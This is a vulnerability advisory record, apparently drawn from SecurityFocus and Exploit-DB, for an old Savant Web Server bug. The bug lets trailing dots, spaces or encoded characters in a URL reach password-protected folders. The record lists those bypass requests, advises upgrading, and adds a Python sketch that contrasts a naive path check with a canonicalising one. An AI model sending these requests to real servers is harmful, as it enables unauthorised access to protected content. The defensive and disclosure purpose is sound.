Vendor: Savant Web Server
By: SecurityFocus
CVSS: 4.3 (MEDIUM)
Input Validation Bug
CWE: 20
Product Name: Savant Web Server
Affected Version From: 3.1 and below
Affected Version To: 3.1 and below
Patch Exists: YES
Related CWE: N/A
CPE: a:savant_web_server:savant_web_server
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

Savant Webserver Input Validation Bug

Savant Webserver is vulnerable to an input validation bug that could allow malicious users access to password-protected folders. It should be noted that versions below 3.1 may also be vulnerable to this issue. An attacker can use the following requests to exploit this vulnerability:

GET /password_folder / HTTP/1.0
http://host/password_folder%2e
http://host/password_folder%20

Mitigation:

Upgrade to the latest version of Savant Webserver
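
For servers that cannot be upgraded immediately, the check this advisory implies can be sketched as follows. This is an added example, not Savant's code or part of the original advisory; it assumes the bypass works because the access check compares the raw request path while Windows file resolution ignores trailing dots and spaces. `PROTECTED` and all function names are hypothetical.

```python
from urllib.parse import unquote

# Constructed ACL for illustration; the folder name is the advisory's placeholder.
PROTECTED = ("/password_folder",)

def path_from_request_line(line: str) -> str:
    """Extract the target from a request line even when it contains spaces."""
    _method, rest = line.split(" ", 1)
    target, _version = rest.rsplit(" ", 1)
    return target

def naive_is_protected(raw_path: str) -> bool:
    """Weak form: matches the raw, undecoded path against the ACL."""
    path = raw_path.rstrip("/")
    return any(path == p or path.startswith(p + "/") for p in PROTECTED)

def canonical_path(raw_path: str) -> str:
    """Decode once, then normalise each segment the way Windows resolves it."""
    segments = []
    for seg in unquote(raw_path).replace("\\", "/").split("/"):
        if seg == "..":
            if segments:
                segments.pop()
            continue
        seg = seg.rstrip(". ").lower()  # trailing dots/spaces are ignored on disk
        if seg:
            segments.append(seg)
    return "/" + "/".join(segments)

def is_protected(raw_path: str) -> bool:
    """Hardened form: authorise on the canonical path, not the raw one."""
    path = canonical_path(raw_path)
    return any(path == p or path.startswith(p + "/") for p in PROTECTED)

# The request forms listed in the advisory, reduced to their paths.
VARIANTS = [
    "/password_folder.",
    path_from_request_line("GET /password_folder / HTTP/1.0"),
    "/password_folder%2e",
    "/password_folder%20",
]

if __name__ == "__main__":
    for v in VARIANTS:
        print(f"{v!r:26} naive={naive_is_protected(v)} hardened={is_protected(v)}")
```

The same `canonical_path` output can be logged next to the raw request path so that any request where the two differ on a protected folder stands out in review.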

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/5709/info

Savant Webserver is vulnerable to an input validation bug that could allow malicious users access to password-protected folders.

It should be noted that versions below 3.1 may also be vulnerable to this issue.

http://host/password_folder.
"GET /password_folder / HTTP/1.0" <-- use with telnet
http://host/password_folder%2e
http://host/password_folder%20